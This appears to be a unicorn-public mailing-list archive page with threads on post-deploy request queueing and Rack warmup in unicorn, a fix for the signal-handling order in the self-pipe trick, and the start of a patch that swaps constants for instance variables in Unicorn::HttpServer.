>>>> > That does make sense - I was looking at another suggestion from a
>>>> user here
>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>> >
>>>> > The only issue I am having with the above solution is it is happening
>>>> in
>>>> > the before_fork block - shouldn't I warmup the connection in
>>>> after_fork?
>>>>
>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>> needs to be after_fork.
>>>>
>>>> > If
>>>> > I follow the above gist properly it warms up the server with the old
>>>> > activerecord base connection and then its turned off, then turned
>>>> back on
>>>> > in after_fork. I think I am not understanding the sequence of events
>>>> > there...
>>>>
>>>> With preload_app and warmup, you need to ensure any stream connections
>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>> child.
>>>>
>>>> > If this is the case, I should warmup and also check/kill the old
>>>> > master in the after_fork block after the new db, redis, neo4j
>>>> connections
>>>> > are all created. Thoughts?
>>>>
>>>> I've been leaving killing the master outside of the unicorn hooks
>>>> and doing it as a separate step; seemed too fragile to do it in
>>>> hooks from my perspective.
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>
>
> --
> "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
> ideologia. Morra por sua ideologia" P.R. Sarkar
>
> EITA - Educação, Informação e Tecnologias para Autogestão
> http://cirandas.net/brauliobo
> http://eita.org.br
>
> "Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
> lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
> Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
> destruídas nas fases de extroversão e introversão do fluxo imaginativo
> cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
> naquele momento, essa pessoa é a única proprietária daquilo que ela
> imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
> por um milharal também imaginado, a pessoa imaginada não é a propriedade
> desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
> universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
> a propriedade deste universo é de Brahma, e não dos microcosmos que também
> foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
> mutável ou imutável, pertence a um indivíduo em particular; tudo é o
> patrimônio comum de todos."
> Restante do texto em
> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>



-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 3%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:24  0%           ` Sarkis Varozian
@ 2015-03-04 20:27  0%             ` Michael Fischer
    1 sibling, 0 replies; 200+ results
From: Michael Fischer @ 2015-03-04 20:27 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: unicorn-public

before_fork should work fine.  The children which will actually handle the
requests will inherit everything from the parent, including any libraries
that were loaded by the master process as a result of handling the mock
requests.  It'll also conserve memory, which is a nice benefit.
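
If you do go the warmup route, a rough sketch (assuming a Rails app
with preload_app true; Rails.application and the '/' path are
assumptions, not something specified in this thread):

    require 'rack/mock'

    before_fork do |server, worker|
      begin
        # hit the preloaded app once in the master so autoloaded code is
        # pulled in before any worker forks
        Rack::MockRequest.new(Rails.application).get('/')
      rescue => e
        server.logger.warn("warmup request failed: #{e.message}")
      end

      defined?(ActiveRecord::Base) and
        ActiveRecord::Base.connection.disconnect!
    end

The disconnect stays after the warmup so the mock request can use the
master's connection before it is dropped; workers reconnect in
after_fork as usual.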

On Wed, Mar 4, 2015 at 12:24 PM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> That does make sense - I was looking at another suggestion from a user
> here (Braulio) of running a "warmup" using rack MockRequest:
> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>
> The only issue I am having with the above solution is it is happening in
> the before_fork block - shouldn't I warmup the connection in after_fork? If
> I follow the above gist properly it warms up the server with the old
> activerecord base connection and then its turned off, then turned back on
> in after_fork. I think I am not understanding the sequence of events
> there... If this is the case, I should warmup and also check/kill the old
> master in the after_fork block after the new db, redis, neo4j connections
> are all created. Thoughts?
>
> On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
> wrote:
>
>> I'm not exactly sure how preload_app works, but I suspect your app is
>> lazy-loading a number of Ruby libraries while handling the first few
>> requests that weren't automatically loaded during the preload process.
>>
>> Eric, your thoughts?
>>
>> --Michael
>>
>> On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Yes, preload_app is set to true, I have not made any changes to the
>>> unicorn.rb from OP: http://goo.gl/qZ5NLn
>>>
>>> Hmmmm, you may be onto something - Here is the i/o metrics from the
>>> server with the highest response times: http://goo.gl/0HyUYt (in this
>>> graph: http://goo.gl/x7KcKq)
>>>
>>> Looks like it may be i/o related as you suspect - is there much I can do
>>> to alleviate that?
>>>
>>> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
>>> wrote:
>>>
>>>> What does your I/O latency look like during this interval?  (iostat -xk
>>>> 10, look at the busy %).  I'm willing to bet the request queueing is
>>>> strongly correlated with I/O load.
>>>>
>>>> Also is preload_app set to true?  This should help.
>>>>
>>>> --Michael
>>>>
>>>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>>>> wrote:
>>>>
>>>>> Michael,
>>>>>
>>>>> Thanks for this - I have since changed the way we are restarting the
>>>>> unicorn servers after a deploy by changing capistrano task to do:
>>>>>
>>>>> in :sequence, wait: 30
>>>>>
>>>>> We have 4 backends and the above will restart them sequentially,
>>>>> waiting 30s (which I think should be more than enough time), however, I
>>>>> still get the following latency spikes after a deploy:
>>>>> http://goo.gl/tYnLUJ
>>>>>
>>>>> This is what the individual servers look like for the same time
>>>>> interval: http://goo.gl/x7KcKq
>>>>>
>>>>>
>>>>>
>>>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>>>> wrote:
>>>>>
>>>>>> If the response times are falling a minute or so after the reload,
>>>>>> I'd chalk it up to a cold CPU cache.  You will probably want to stagger
>>>>>> your reloads across backends to minimize the impact.
>>>>>>
>>>>>> --Michael
>>>>>>
>>>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>>>> wrote:
>>>>>>
>>>>>>> We have a rails application with the following unicorn.rb:
>>>>>>> http://goo.gl/qZ5NLn
>>>>>>>
>>>>>>> When we deploy to the application, a USR2 signal is sent to the
>>>>>>> unicorn
>>>>>>> master which spins up a new master and we use the before_fork in the
>>>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>>>> workers come online.
>>>>>>>
>>>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is
>>>>>>> inconsistent -
>>>>>>> there is always a latency spike - however, at times Request Queueing
>>>>>>> is
>>>>>>> higher than previous deploys.
>>>>>>>
>>>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>>>> tools/profilers to use to get to the bottom of this? Should we
>>>>>>> expect this
>>>>>>> to happen on each deploy?
>>>>>>>
>>>>>>> Thanks,
>>>>>>>
>>>>>>> --
>>>>>>> *Sarkis Varozian*
>>>>>>> svarozian@gmail.com
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> *Sarkis Varozian*
>>>>> svarozian@gmail.com
>>>>>
>>>>
>>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>




^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:17  0%         ` Michael Fischer
@ 2015-03-04 20:24  0%           ` Sarkis Varozian
  2015-03-04 20:27  0%             ` Michael Fischer
    0 siblings, 2 replies; 200+ results
From: Sarkis Varozian @ 2015-03-04 20:24 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

That does make sense - I was looking at another suggestion from a user here
(Braulio) of running a "warmup" using rack MockRequest:
https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77

The only issue I am having with the above solution is it is happening in
the before_fork block - shouldn't I warmup the connection in after_fork? If
I follow the above gist properly it warms up the server with the old
activerecord base connection and then it's turned off, then turned back on
in after_fork. I think I am not understanding the sequence of events
there... If this is the case, I should warmup and also check/kill the old
master in the after_fork block after the new db, redis, neo4j connections
are all created. Thoughts?

On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
wrote:

> I'm not exactly sure how preload_app works, but I suspect your app is
> lazy-loading a number of Ruby libraries while handling the first few
> requests that weren't automatically loaded during the preload process.
>
> Eric, your thoughts?
>
> --Michael
>
> On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Yes, preload_app is set to true, I have not made any changes to the
>> unicorn.rb from OP: http://goo.gl/qZ5NLn
>>
>> Hmmmm, you may be onto something - Here is the i/o metrics from the
>> server with the highest response times: http://goo.gl/0HyUYt (in this
>> graph: http://goo.gl/x7KcKq)
>>
>> Looks like it may be i/o related as you suspect - is there much I can do
>> to alleviate that?
>>
>> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
>> wrote:
>>
>>> What does your I/O latency look like during this interval?  (iostat -xk
>>> 10, look at the busy %).  I'm willing to bet the request queueing is
>>> strongly correlated with I/O load.
>>>
>>> Also is preload_app set to true?  This should help.
>>>
>>> --Michael
>>>
>>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Michael,
>>>>
>>>> Thanks for this - I have since changed the way we are restarting the
>>>> unicorn servers after a deploy by changing capistrano task to do:
>>>>
>>>> in :sequence, wait: 30
>>>>
>>>> We have 4 backends and the above will restart them sequentially,
>>>> waiting 30s (which I think should be more than enough time), however, I
>>>> still get the following latency spikes after a deploy:
>>>> http://goo.gl/tYnLUJ
>>>>
>>>> This is what the individual servers look like for the same time
>>>> interval: http://goo.gl/x7KcKq
>>>>
>>>>
>>>>
>>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>>> wrote:
>>>>
>>>>> If the response times are falling a minute or so after the reload, I'd
>>>>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>>>>> reloads across backends to minimize the impact.
>>>>>
>>>>> --Michael
>>>>>
>>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>>> wrote:
>>>>>
>>>>>> We have a rails application with the following unicorn.rb:
>>>>>> http://goo.gl/qZ5NLn
>>>>>>
>>>>>> When we deploy to the application, a USR2 signal is sent to the
>>>>>> unicorn
>>>>>> master which spins up a new master and we use the before_fork in the
>>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>>> workers come online.
>>>>>>
>>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent
>>>>>> -
>>>>>> there is always a latency spike - however, at times Request Queueing
>>>>>> is
>>>>>> higher than previous deploys.
>>>>>>
>>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>>> tools/profilers to use to get to the bottom of this? Should we expect
>>>>>> this
>>>>>> to happen on each deploy?
>>>>>>
>>>>>> Thanks,
>>>>>>
>>>>>> --
>>>>>> *Sarkis Varozian*
>>>>>> svarozian@gmail.com
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>


-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 19:58  0%       ` Sarkis Varozian
@ 2015-03-04 20:17  0%         ` Michael Fischer
  2015-03-04 20:24  0%           ` Sarkis Varozian
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2015-03-04 20:17 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: unicorn-public

I'm not exactly sure how preload_app works, but I suspect your app is
lazy-loading a number of Ruby libraries that weren't automatically loaded
during the preload process while handling the first few requests.
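
One way to rule that out is to leave nothing to the autoloader in
production.  A sketch, assuming Rails 4+ (config.eager_load is a Rails
setting, not a unicorn one):

    # config/environments/production.rb
    Rails.application.configure do
      # load all application code at boot so preload_app true in unicorn
      # really preloads it, instead of autoloading on the first requests
      config.eager_load = true
    end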

Eric, your thoughts?

--Michael

On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> Yes, preload_app is set to true, I have not made any changes to the
> unicorn.rb from OP: http://goo.gl/qZ5NLn
>
> Hmmmm, you may be onto something - Here is the i/o metrics from the server
> with the highest response times: http://goo.gl/0HyUYt (in this graph:
> http://goo.gl/x7KcKq)
>
> Looks like it may be i/o related as you suspect - is there much I can do
> to alleviate that?
>
> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
> wrote:
>
>> What does your I/O latency look like during this interval?  (iostat -xk
>> 10, look at the busy %).  I'm willing to bet the request queueing is
>> strongly correlated with I/O load.
>>
>> Also is preload_app set to true?  This should help.
>>
>> --Michael
>>
>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Michael,
>>>
>>> Thanks for this - I have since changed the way we are restarting the
>>> unicorn servers after a deploy by changing capistrano task to do:
>>>
>>> in :sequence, wait: 30
>>>
>>> We have 4 backends and the above will restart them sequentially, waiting
>>> 30s (which I think should be more than enough time), however, I still get
>>> the following latency spikes after a deploy: http://goo.gl/tYnLUJ
>>>
>>> This is what the individual servers look like for the same time
>>> interval: http://goo.gl/x7KcKq
>>>
>>>
>>>
>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>> wrote:
>>>
>>>> If the response times are falling a minute or so after the reload, I'd
>>>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>>>> reloads across backends to minimize the impact.
>>>>
>>>> --Michael
>>>>
>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>> wrote:
>>>>
>>>>> We have a rails application with the following unicorn.rb:
>>>>> http://goo.gl/qZ5NLn
>>>>>
>>>>> When we deploy to the application, a USR2 signal is sent to the unicorn
>>>>> master which spins up a new master and we use the before_fork in the
>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>> workers come online.
>>>>>
>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent -
>>>>> there is always a latency spike - however, at times Request Queueing is
>>>>> higher than previous deploys.
>>>>>
>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>> tools/profilers to use to get to the bottom of this? Should we expect
>>>>> this
>>>>> to happen on each deploy?
>>>>>
>>>>> Thanks,
>>>>>
>>>>> --
>>>>> *Sarkis Varozian*
>>>>> svarozian@gmail.com
>>>>>
>>>>>
>>>>>
>>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>




^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 19:51  0%     ` Michael Fischer
@ 2015-03-04 19:58  0%       ` Sarkis Varozian
  2015-03-04 20:17  0%         ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Sarkis Varozian @ 2015-03-04 19:58 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Yes, preload_app is set to true, I have not made any changes to the
unicorn.rb from OP: http://goo.gl/qZ5NLn

Hmmmm, you may be onto something - Here are the i/o metrics from the server
with the highest response times: http://goo.gl/0HyUYt (in this graph:
http://goo.gl/x7KcKq)

Looks like it may be i/o related as you suspect - is there much I can do to
alleviate that?

On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
wrote:

> What does your I/O latency look like during this interval?  (iostat -xk
> 10, look at the busy %).  I'm willing to bet the request queueing is
> strongly correlated with I/O load.
>
> Also is preload_app set to true?  This should help.
>
> --Michael
>
> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Michael,
>>
>> Thanks for this - I have since changed the way we are restarting the
>> unicorn servers after a deploy by changing capistrano task to do:
>>
>> in :sequence, wait: 30
>>
>> We have 4 backends and the above will restart them sequentially, waiting
>> 30s (which I think should be more than enough time), however, I still get
>> the following latency spikes after a deploy: http://goo.gl/tYnLUJ
>>
>> This is what the individual servers look like for the same time interval:
>> http://goo.gl/x7KcKq
>>
>>
>>
>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>> wrote:
>>
>>> If the response times are falling a minute or so after the reload, I'd
>>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>>> reloads across backends to minimize the impact.
>>>
>>> --Michael
>>>
>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> We have a rails application with the following unicorn.rb:
>>>> http://goo.gl/qZ5NLn
>>>>
>>>> When we deploy to the application, a USR2 signal is sent to the unicorn
>>>> master which spins up a new master and we use the before_fork in the
>>>> unicorn.rb config above to send signals to the old master as the new
>>>> workers come online.
>>>>
>>>> I've been trying to debug a weird issue that manifests as "Request
>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>> deployment (represented by the vertical lines). Here is the graph:
>>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent -
>>>> there is always a latency spike - however, at times Request Queueing is
>>>> higher than previous deploys.
>>>>
>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>> tools/profilers to use to get to the bottom of this? Should we expect
>>>> this
>>>> to happen on each deploy?
>>>>
>>>> Thanks,
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>>
>>>>
>>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>


-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 19:48  3%   ` Sarkis Varozian
@ 2015-03-04 19:51  0%     ` Michael Fischer
  2015-03-04 19:58  0%       ` Sarkis Varozian
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2015-03-04 19:51 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: unicorn-public

What does your I/O latency look like during this interval?  (iostat -xk 10,
look at the busy %).  I'm willing to bet the request queueing is strongly
correlated with I/O load.

Also is preload_app set to true?  This should help.

--Michael

On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> Michael,
>
> Thanks for this - I have since changed the way we are restarting the
> unicorn servers after a deploy by changing capistrano task to do:
>
> in :sequence, wait: 30
>
> We have 4 backends and the above will restart them sequentially, waiting
> 30s (which I think should be more than enough time), however, I still get
> the following latency spikes after a deploy: http://goo.gl/tYnLUJ
>
> This is what the individual servers look like for the same time interval:
> http://goo.gl/x7KcKq
>
>
>
> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
> wrote:
>
>> If the response times are falling a minute or so after the reload, I'd
>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>> reloads across backends to minimize the impact.
>>
>> --Michael
>>
>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> We have a rails application with the following unicorn.rb:
>>> http://goo.gl/qZ5NLn
>>>
>>> When we deploy to the application, a USR2 signal is sent to the unicorn
>>> master which spins up a new master and we use the before_fork in the
>>> unicorn.rb config above to send signals to the old master as the new
>>> workers come online.
>>>
>>> I've been trying to debug a weird issue that manifests as "Request
>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>> deployment (represented by the vertical lines). Here is the graph:
>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent -
>>> there is always a latency spike - however, at times Request Queueing is
>>> higher than previous deploys.
>>>
>>> Any ideas on what exactly is going on here? Any suggestions on
>>> tools/profilers to use to get to the bottom of this? Should we expect
>>> this
>>> to happen on each deploy?
>>>
>>> Thanks,
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>>
>>>
>>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>




^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  @ 2015-03-04 19:48  3%   ` Sarkis Varozian
  2015-03-04 19:51  0%     ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Sarkis Varozian @ 2015-03-04 19:48 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Michael,

Thanks for this - I have since changed the way we are restarting the
unicorn servers after a deploy by changing capistrano task to do:

in :sequence, wait: 30

We have 4 backends and the above will restart them sequentially, waiting
30s (which I think should be more than enough time); however, I still get
the following latency spikes after a deploy: http://goo.gl/tYnLUJ

This is what the individual servers look like for the same time interval:
http://goo.gl/x7KcKq



On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
wrote:

> If the response times are falling a minute or so after the reload, I'd
> chalk it up to a cold CPU cache.  You will probably want to stagger your
> reloads across backends to minimize the impact.
>
> --Michael
>
> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> We have a rails application with the following unicorn.rb:
>> http://goo.gl/qZ5NLn
>>
>> When we deploy to the application, a USR2 signal is sent to the unicorn
>> master which spins up a new master and we use the before_fork in the
>> unicorn.rb config above to send signals to the old master as the new
>> workers come online.
>>
>> I've been trying to debug a weird issue that manifests as "Request
>> Queueing" in our Newrelic APM. The graph shows what happens after a
>> deployment (represented by the vertical lines). Here is the graph:
>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent -
>> there is always a latency spike - however, at times Request Queueing is
>> higher than previous deploys.
>>
>> Any ideas on what exactly is going on here? Any suggestions on
>> tools/profilers to use to get to the bottom of this? Should we expect this
>> to happen on each deploy?
>>
>> Thanks,
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>>
>>
>


-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 3%]

* Re: Bug, Unicorn can drop signals in extreme conditions
  2015-02-16  2:19  4% Bug, Unicorn can drop signals in extreme conditions Steven Stewart-Gallus
@ 2015-02-18  9:15  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-18  9:15 UTC (permalink / raw)
  To: Steven Stewart-Gallus; +Cc: unicorn-public, Jesse Storimer

Steven Stewart-Gallus <sstewartgallus00@mylangara.bc.ca> wrote:
> Hello,
> 
> While reading the article at
> http://www.sitepoint.com/the-self-pipe-trick-explained/ I realized
> that the signal handling code shown there and of the same type in your
> application is broken.  As you have a single nonblocking pipe in your
> application you can drop signals entirely (and not just fold multiple
> signals of the same type into one).  The simplest fix is to use a pipe
> for each individual type of signal or to just use pselect or similar.
> I'm pretty sure that there is a way to use a single pipe but it seems
> complicated and very difficult to implement correctly.

(I've Cc-ed Jesse for this)

I wasn't sure exactly what you were referring to, but now I see where
the sitepoint.com article makes calls in the wrong order:

     self_writer.write_nonblock('.') # XXX may fail!
     SIGNAL_QUEUE << signal

In contrast, unicorn enqueues the signal before attempting to write to
the pipe, so we don't care at all if the write fails.  It doesn't matter
if the non-blocking write fails because the pipe is full, since
any existing data in the pipe is sufficient to cause the reader to wake
up.

The correct order would be:

     SIGNAL_QUEUE << signal
     self_writer.write_nonblock('.') # we don't care if this fails

Furthermore, this avoids a race condition in multi-threaded situations.
Order is critical: even outside of signal handlers, this ordering of
events is fundamental to correct usage of things like condition
variables and waitqueues.
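
To make the ordering concrete, here is a small self-contained sketch of
the self-pipe trick with enqueue-before-write (plain Ruby 1.9+, not
unicorn's actual code; the signal list and loop body are illustrative):

     SIG_QUEUE = []
     rd, wr = IO.pipe

     %w(INT TERM QUIT).each do |sig|
       trap(sig) do
         SIG_QUEUE << sig            # 1) enqueue first
         begin
           wr.write_nonblock('.')    # 2) then wake the main loop
         rescue Errno::EAGAIN, Errno::EINTR
           # a full pipe is fine: pending bytes already guarantee a wakeup
         end
       end
     end

     loop do
       IO.select([rd])               # sleep until a signal arrives
       begin
         rd.read_nonblock(11)        # drain the wakeup bytes
       rescue Errno::EAGAIN
       end
       while sig = SIG_QUEUE.shift
         puts "got SIG#{sig}"
         exit(0) if %w(INT TERM QUIT).include?(sig)
       end
     end

With the article's write-first ordering, a write_nonblock that raises
aborts the handler before the signal is ever enqueued, which is exactly
the dropped-signal case reported above; enqueue-first makes a failed
write harmless.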


Btw, MRI 1.9.3+ uses the self-pipe trick internally, too (see
thread_pthread.c), for signals and thread switching.  Current versions
use two pipes, one for high-priority wakeups, and one for low-priority
wakeups.

And on a related note, using pselect/ppoll/epoll_pwait/signalfd-style
syscalls which affect the signal mask is not feasible with runtimes
which already implement a high-level signal handling API.  I ripped out
signalfd support from sleepy_penguin a few years back because it would
always conflict with the signal handling API in Ruby itself...

And eventfd is cheaper and usable in place of a self-pipe from Ruby, of
course(*), but I haven't convinced ruby-core it's worth the maintenance
effort for thread_pthread.c; so a conservative project like unicorn
won't use it, yet.

Anyways, thanks for bringing this to our attention.


(*) I use it in yet another horribly-named server :)

^ permalink raw reply	[relevance 0%]

* Bug, Unicorn can drop signals in extreme conditions
@ 2015-02-16  2:19  4% Steven Stewart-Gallus
  2015-02-18  9:15  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Steven Stewart-Gallus @ 2015-02-16  2:19 UTC (permalink / raw)
  To: unicorn-public

Hello,

While reading the article at
http://www.sitepoint.com/the-self-pipe-trick-explained/ I realized
that the signal handling code shown there and of the same type in your
application is broken.  As you have a single nonblocking pipe in your
application you can drop signals entirely (and not just fold multiple
signals of the same type into one).  The simplest fix is to use a pipe
for each individual type of signal or to just use pselect or similar.
I'm pretty sure that there is a way to use a single pipe but it seems
complicated and very difficult to implement correctly.

Thank you,
Steven Stewart-Gallus

^ permalink raw reply	[relevance 4%]

* [PATCH] http_server: favor ivars over constants
@ 2015-02-12 19:09  8% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-12 19:09 UTC (permalink / raw)
  To: unicorn-public

In 1.9+ at least, instance variables use less space than constants
in class tables and bytecode, leading to ~700 byte reduction in
bytecode overhead on 64-bit and a reduction in constant table/entries
of the Unicorn::HttpServer class.
---
 lib/unicorn/http_server.rb | 77 +++++++++++++++++++++-------------------------
 1 file changed, 35 insertions(+), 42 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f0216d0..278b469 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -21,32 +21,12 @@ class Unicorn::HttpServer
   include Unicorn::SocketHelper
   include Unicorn::HttpResponse
 
-  # backwards compatibility with 1.x
-  Worker = Unicorn::Worker
-
   # all bound listener sockets
   LISTENERS = []
 
   # listeners we have yet to bind
   NEW_LISTENERS = []
 
-  # This hash maps PIDs to Workers
-  WORKERS = {}
-
-  # We use SELF_PIPE differently in the master and worker processes:
-  #
-  # * The master process never closes or reinitializes this once
-  # initialized.  Signal handlers in the master process will write to
-  # it to wake up the master from IO.select in exactly the same manner
-  # djb describes in http://cr.yp.to/docs/selfpipe.html
-  #
-  # * The workers immediately close the pipe they inherit.  See the
-  # Unicorn::Worker class for the pipe workers use.
-  SELF_PIPE = []
-
-  # signal queue used for self-piping
-  SIG_QUEUE = []
-
   # list of signals we care about and trap in master.
   QUEUE_SIGS = [ :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU ]
 
@@ -98,6 +78,19 @@ class Unicorn::HttpServer
     self.config = Unicorn::Configurator.new(options)
     self.listener_opts = {}
 
+    # We use @self_pipe differently in the master and worker processes:
+    #
+    # * The master process never closes or reinitializes this once
+    # initialized.  Signal handlers in the master process will write to
+    # it to wake up the master from IO.select in exactly the same manner
+    # djb describes in http://cr.yp.to/docs/selfpipe.html
+    #
+    # * The workers immediately close the pipe they inherit.  See the
+    # Unicorn::Worker class for the pipe workers use.
+    @self_pipe = []
+    @workers = {} # hash maps PIDs to Workers
+    @sig_queue = [] # signal queue used for self-piping
+
     # we try inheriting listeners first, so we bind them later.
     # we don't write the pid file until we've bound listeners in case
     # unicorn was started twice by mistake.  Even though our #pid= method
@@ -117,13 +110,13 @@ class Unicorn::HttpServer
     inherit_listeners!
     # this pipe is used to wake us up from select(2) in #join when signals
     # are trapped.  See trap_deferred.
-    SELF_PIPE.replace(Unicorn.pipe)
+    @self_pipe.replace(Unicorn.pipe)
     @master_pid = $$
 
     # setup signal handlers before writing pid file in case people get
     # trigger happy and send signals as soon as the pid file exists.
